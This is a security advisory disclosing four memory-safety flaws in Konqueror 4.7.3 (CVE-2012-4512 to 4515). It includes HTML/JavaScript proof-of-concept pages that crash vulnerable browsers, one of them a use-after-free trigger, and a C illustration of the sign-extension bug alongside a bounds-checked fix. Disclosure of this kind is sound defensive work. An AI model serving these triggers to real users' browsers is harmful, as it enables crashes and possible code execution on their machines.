Credit:
The information has been provided by Tim Brown.
Vulnerable Systems:
* Konqueror 4.7.3
1) The Konqueror web browser is vulnerable to type confusion leading to memory disclosure. The root cause of this is the same as CVE-2010-0046 reported by Chris Rohlf which affected WebKit.
2) The Konqueror web browser is vulnerable to an out of bounds memory access when accessing the canvas. In this case the vulnerability was identified whilst playing with bug #43813 from Google's Chrome repository.
3) The Konqueror web browser is vulnerable to a NULL pointer dereference leading to a crash.
4) The Konqueror web browser is vulnerable to a "use-after-free" class flaw when the context menu is used whilst the document DOM is being changed from within Javascript.
These flaws were identified during an analysis of previously reported vulnerabilities that affected Google's Chrome web browser. It is believed that only vulnerability 1 is/was common to the two code bases.
There was a sign extension in calculating the dimensions of the canvas within scaleLoop, which led to a miscalculated jump. According to KDE, on 64-bit systems this appeared only to allow a crash to be triggered; however, on 32-bit systems it could lead to memory disclosure.
The following PoC can trigger the crash on vulnerable versions of Konqueror:
<html>
  <body>
    <canvas id="tutorial"></canvas>
    <script type="text/javascript">
      var canvas = document.getElementById("tutorial");
      if (canvas.getContext) {
        var ctx = canvas.getContext("2d");
        canvas.width = 111111;
      }
    </script>
  </body>
</html>
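To show the mechanism described above (a canvas size computed in a signed 32-bit int that wraps negative and then sign-extends when used as a size_t index), here is a constructed C illustration that is not Konqueror's code: the buggy computation beside a checked one, plus a helper showing why the same negative index behaves differently on 32- and 64-bit builds. The function names and the canvas sizes used are assumptions chosen for the demo.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#define BYTES_PER_PIXEL 4u

/* Buggy pattern (constructed, not Konqueror's code): the canvas byte size is
 * computed in a signed 32-bit int, so a large width*height wraps negative.
 * The multiply is done in uint32_t so the demo itself is well-defined. */
int32_t buggy_canvas_bytes(uint32_t width, uint32_t height) {
    return (int32_t)(width * height * BYTES_PER_PIXEL);
}

/* The negative int32 is then used as a size_t index: the conversion
 * sign-extends it, producing the miscalculated jump the advisory describes. */
size_t buggy_pixel_offset(uint32_t width, uint32_t height) {
    return (size_t)buggy_canvas_bytes(width, height);
}

/* Why 32-bit builds leak while 64-bit builds crash: the same negative index
 * becomes 0xFFFFFFFF80000000 under a 64-bit size_t (almost certainly unmapped)
 * but 0x80000000 under a 32-bit size_t, which can still be mapped memory. */
uint64_t widen_index(int32_t index, unsigned size_t_bits) {
    if (size_t_bits == 32)
        return (uint64_t)(uint32_t)index;   /* truncation only */
    return (uint64_t)(int64_t)index;        /* sign extension */
}

/* Hardened: compute in 64 bits and reject sizes that overflow 32 bits or
 * exceed the backing buffer before anything is ever indexed. */
bool checked_pixel_offset(uint32_t width, uint32_t height,
                          size_t buffer_len, size_t *out) {
    if (width == 0 || height == 0)
        return false;
    uint64_t bytes = (uint64_t)width * height * BYTES_PER_PIXEL;
    if (bytes > UINT32_MAX || bytes > buffer_len)
        return false;
    if (out)
        *out = (size_t)bytes;
    return true;
}

int main(void) {
    /* Constructed size: 32768 * 16384 * 4 == 2^31, the smallest product that goes negative. */
    printf("buggy int32 bytes: %d\n", buggy_canvas_bytes(32768u, 16384u));
    printf("as size_t index:   %zu\n", buggy_pixel_offset(32768u, 16384u));
    printf("checked: %s\n", checked_pixel_offset(32768u, 16384u, (size_t)1 << 20, NULL) ? "accepted" : "rejected");
    return 0;
}
```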
Unfortunately I no longer have the stack trace for this crash; however, it can be triggered on vulnerable versions of Konqueror using the following PoC:
<html>
  <body>
    <iframe name="test" src="http://www.google.co.uk"></iframe>
    <input type=button value="test"
           onclick="window.open('javascript:alert(document.cookie)','test')" >
  </body>
</html>
Accessing the context menu for a given iframe whilst the iframe is being updated by the parent can lead to attempts to access no-longer-existing objects. This may lead to a crash, or potentially code execution, depending on the state of the process at the point the no-longer-existing object is accessed.
The following PoC can trigger the crash on vulnerable versions of Konqueror:
<html>
  <body>
    <script>
      setInterval(function () {
        document.body.innerHTML = "<iframe src=about:konqueror></iframe>";
      }, 300);
    </script>
  </body>
</html>
CVE Information:
* CVE-2012-4512 - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4512
* CVE-2012-4513 - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4513
* CVE-2012-4514 - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4514
* CVE-2012-4515 - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4515
Disclosure Timeline:
Released On: 10th October 2012